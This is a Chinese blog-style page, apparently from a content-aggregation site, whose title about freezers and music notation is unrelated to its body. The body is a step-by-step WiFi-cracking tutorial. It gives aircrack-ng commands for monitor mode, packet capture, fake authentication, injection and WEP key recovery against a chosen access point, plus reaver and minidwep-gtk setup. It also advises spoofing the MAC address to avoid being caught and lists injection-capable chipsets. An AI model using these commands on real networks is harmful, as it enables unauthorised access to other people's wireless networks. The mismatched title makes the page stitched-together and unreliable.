首页 > 编程知识 正文

使用冰箱冷冻室时要注意什么不能放进冰箱冷冻室,使用合四一上尺工凡等字样为唱名的是

时间:2023-05-05 02:04:38 阅读:251884 作者:4838

【1】wifi破解
【2】ubuntu14.0.4安装步骤
【3】Ubuntu下Aircrack-ng工具包的使用
【4】常用芯片类型
【5】kali2019安装

【1】wifi破解
1.wep加密:此类加密比较老旧,现在的无线路由器已经很少使用此类加密方式,破解只需要大量的数据包即可。
2.WPA / WPA2 PSK加密:这类加密是很安全的,破解的方式是抓握手包然后跑字典。
3.一部分路由器为了方便用户,设置了QSS快速连接功能(或者叫WPS功能)。破解方式是抓握手包跑字典和跑PIN码2种。

【2】ubuntu14.0.4安装步骤
原文连接

安装依赖
sudo apt-get install build-essential libssl-dev iw libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev libssl0.9.8 libnl libnl-dev安装aircrack-ng-1.1 tar xvf aircrack-ng-1.1.tar.gz -C ./cd aircrack-ng-1.1#修改common.mak 这个文件,找到:CFLAGS ?= -g -W -Wall -Werror -O3修改为:CFLAGS ?= -g -W -Wall -O3#开始安装: sudo make sudo make install

#错误解决(Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).)
sudo airodump-ng-oui-update

#ubuntu 中 aircrack-ng 使用教程1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0 #wlan0是无线网卡的端口,可用命令 ifconfig 查看2、查看无线AP在终端中输入:sudo airodump-ng mon0#mon0 是启动监控模式后无线网的端口(虚拟网卡),查看有哪些采用wep加密的AP在线,然后按 ctrl+c 中止,不要关闭终端。3、抓包,打开另一个终端,输入:airodump-ng -c 7 -w wep --bssid CC:08:FB:8C:1E:67 mon0#-c 后面跟着的6是要破解的AP工作频道,–bissid后面跟着欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名4、与AP建立虚拟连接,再打开一个新终端,输入:sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0#-h后面跟着的My MAC是自己的无线网卡的MAC地址,即ifconfig命令下wlan0对应的mac地址5、进行注入,成功建立虚拟连接后输入:sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0#现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)6、解密,收集有15000个以上的DATA之后,另开一个终端,切换到aircrack-ng-1.1目录,执行以下命令sudo aircrack-ng wep*.cap#进行解密,如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的7、收工,破解出密码后在终端中输入 sudo airmon-ng stop mon0 #关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。8、如果要卸载ubuntu 上的aircrack-ng,可切换到aircrack-ng-1.1 目录,执行sudo make uninstall 安装reaver-1.4 cd reaver-1.4cd src./configuresudo make sudo make install

安装minidwep-gtk-40420-ubuntu-64bit
sudo dpkg -i minidwep-gtk-40420-ubuntu-64bit.deb
#运行软件
sudo minidwep-gtk

常见错误

1.avahi-daemon进程导致网卡监控模式无法打开#Avahi 是 zeroconf 协议的实现。它可以在没有 DNS 服务的局域网里发现基于 zeroconf 协议的设备和服务。它跟 mDNS 一样。除非你有兼容的设备或使用 zeroconf 协议的服务,否则应该关闭它。/etc/init.d/avahi-daemon stop or service avahi-daemon stop

【3】Ubuntu下Aircrack-ng工具包的使用
原文链接

安装:$sudo apt-get install aircrack-ngAircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:airmon-ng处理网卡工作模式airodump-ng抓包aircrack-ng破解aireplay-ng发包,干扰1)airmon-ng,启动无线网卡进入Monitor模式,useage:airmon-ng<start|stop|check><interface>[channel]<start|stop|check>:启动,停止,检测<interface>:指定无线网卡[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了2)airodump-ng,抓包工具,详细用法如下:usage:airodump-ng<options><interface>[,<interface>,...]Options:–ivs:仅将抓取信息保存为.ivs–write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的Filteroptions:–encrypt<suite>:使用密码序列过滤AP–netmask<netmask>:使用掩码过滤AP-bssid<bssid>:使用bssid过滤AP-a:过滤无关的客户端–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文3)aireplay-ng,搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉)usage:aireplay-ng<options><replayinterface>Filteroptions:-bbssid:AP的MAC-ddmac:目标的MAC-ssmac:来源的MAC-mlen:最小包长度-nlen:最大包长度-D:禁用AP发现功能Replayoptions:-xnbpps:每秒包数量-pfctrl:框架设定(hex)-abssid:设置AP的mac-cdmac:设置目标的MAC-hsmac:设置来源的mac-gvalue:改变环缓存大小(默认8)Fakeauthattackoptions:-eessid:设置目标AP的SSID-onpckts:每秒爆破的包数量(0自动,默认1)-qsec:存活时间秒-yprga:共享可信的key流–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.4)aircrack-ng,破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.usage:aircrack-ng[options]<.cap/.ivsfile(s)>Commonoptions:-a<amode>:暴破(1/WEP,2/WPA-PSK)-e<essid>:选择essid为目标-b<bssid>:选择ap的mac为目标,就是破解识别的关键字-q:使用安静模式,无数出模式-C<macs>:将所有的AP合并为一个虚拟的–help:显示这个帮助#就WEP破解说明,步骤:1.修改无线网卡状态:先down掉2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡4.修改无线网卡状态:up5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标6.监听抓包:生成.cap或.ivs7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8.破解.cap或.ivs,获得WEP密码,完成破解

【4】常用芯片类型
用于抓取无线数据包稳定和兼容比较好的三款芯片:
1.RT3070(L)/RT5572:即插即用支持混杂模式、注入模式、AP模式。
2.RT8187(L):即插即用支持混杂模式、注入模式、AP模式。
3.AR9271:即插即用支持混杂模式、注入模式、AP模式。
对于Linux(像Ubuntu、Kali、Debian、Centos等等),这三款芯片即插即用,无需再手动安装驱动。

以下是一些可以在kali上正常工作的芯片组:
Atheros AR9271
Ralink RT3070
Ralink RT3572
Realtek 8187L (Wireless G adapters)
Realtek RTL8812AU (2017年新增)
Ralink RT5370N

CDLINUX支持的芯片
雷凌Ralink 3070芯片
瑞昱Realtek 8187L芯片

【5】kali2019安装
Kali下载地址
安装教程

#Kali Linux 镜像 各个版本之间的区别按处理器架构来划分的话,有 64 bit、32 bit、armhf、armel等版本。加light的是轻量版。e17、Mate、LXDE等是不同的桌面环境。Kali Linux 2016.2 支持GNOME、KDE、Mate、LXDE和Enlightenment等桌面环境。#kali2019.2 安装要求,vmware15 配置静态IP开启ssh #修改sshd_config文件vim /etc/ssh/sshd_config将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes将PermitRootLogin without-password修改为PermitRootLogin yes#重启sshservice ssh restart#开机启动update-rc.d ssh enable //系统自动启动SSH服务update-rc.d ssh disabled // 关闭系统自动启动SSH服务 ll命令不能使用 #修改.bashrc文件vim ~/.bashrcalias ll='ls -l' #添加别名source ~/.bashrc 安装rtl8812au驱动 #配置apt源vim /etc/apt/sources.listdeb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribapt-get updateapt install realtek-rtl88xxau-dkms #设置usb3.0并重启 安装minidwep-gtk-40420-ubuntu-64bit
sudo dpkg -i minidwep-gtk-40420-ubuntu-64bit.deb
#运行软件
reboot
sudo minidwep-gtk

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。